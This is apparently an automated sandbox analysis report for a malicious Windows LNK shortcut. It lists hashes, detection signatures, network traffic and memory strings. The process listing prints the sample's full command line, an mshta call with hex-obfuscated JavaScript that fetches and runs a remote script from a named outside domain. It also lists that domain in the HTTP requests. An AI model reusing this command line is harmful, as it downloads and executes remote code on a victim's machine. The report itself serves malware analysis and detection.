Windows Analysis Report
ProconGO1121082800.LnK.lnk

Overview

General Information

Sample name: ProconGO1121082800.LnK.lnk
Analysis ID: 1431784
MD5: 3849799c2978740cc3e27cc3ec5980c5
SHA1: 6dfe666bdc1e961d29d56fb9754ed24590b43c8f
SHA256: a1bda78309cd02e62af859fe5171b65baa9b34861088e8c9fede648d4ef0fca4
Tags: lnk

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 5224 cmdline: MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: ProconGO1121082800.LnK.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.21.29.223:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: Joe Sandbox View | IP Address: 104.244.42.65 104.244.42.65
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /?1/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: flinanmansal.roupagucci.sbs
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.twitter.com
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: twitter.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: flinanmansal.roupagucci.sbs
Source: global traffic | DNS traffic detected: DNS query: www.twitter.com
Source: global traffic | DNS traffic detected: DNS query: twitter.com
Source: mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112009127.000002A68F0DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: HTtps://flinanmansal.roupagucci.sbs/?1/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cm.g.doubleclick.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net;
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://flinanmansal.roupagucci.sbs/
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/9?s
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/??u
Source: mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/Ztu
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.twitter.com/using-twitter/twitter-supported-browsers
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iframe.arkos
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iframe.arkoselabs.com/
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://legal.twitter.com/imprint.html
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://localhost.twitter.com:3443
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://localhost.x.com:3443;
Source: mshta.exe, 00000003.00000002.2113778089.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110887212.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maps.googleapis.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://media.riffsy.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://media.tenor.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mmdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mobile.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mobile.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mpdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pay.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pay.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://platform-lookaside.fbsbx.com
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://prod-periscope-profile.s1
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://prod-periscope-profile.s3-us-west-2.amazonaws.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://scontent-sea1-1.xx.fbcdn.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://scontent.xx.fbcdn.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sentry.io
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://static.ads-twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.twitter.com/articles/20170514
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.co/1/i/adsct;
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton-staging.atla.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton-staging.atla.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton-staging.pdxa.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton-staging.pdxa.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ton.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/$
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/(
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/privacy
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/tos
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://upload.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://upload.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vaultjs.apideck.com/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vmap.grabyo.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vmap.snappytv.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vmaprel.snappytv.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vmapstage.snappytv.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/;
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.periscope.tv
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.pscp.tv
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com(
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com/
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com/0
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com/8
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com/H
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.twitter.com/x
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://x.com
